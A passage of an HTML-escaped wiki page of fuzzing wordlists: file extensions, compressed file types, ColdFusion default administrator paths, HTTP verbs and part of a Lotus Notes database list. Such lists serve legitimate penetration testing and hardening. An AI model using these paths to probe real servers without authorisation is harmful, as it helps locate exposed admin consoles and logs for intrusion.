.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
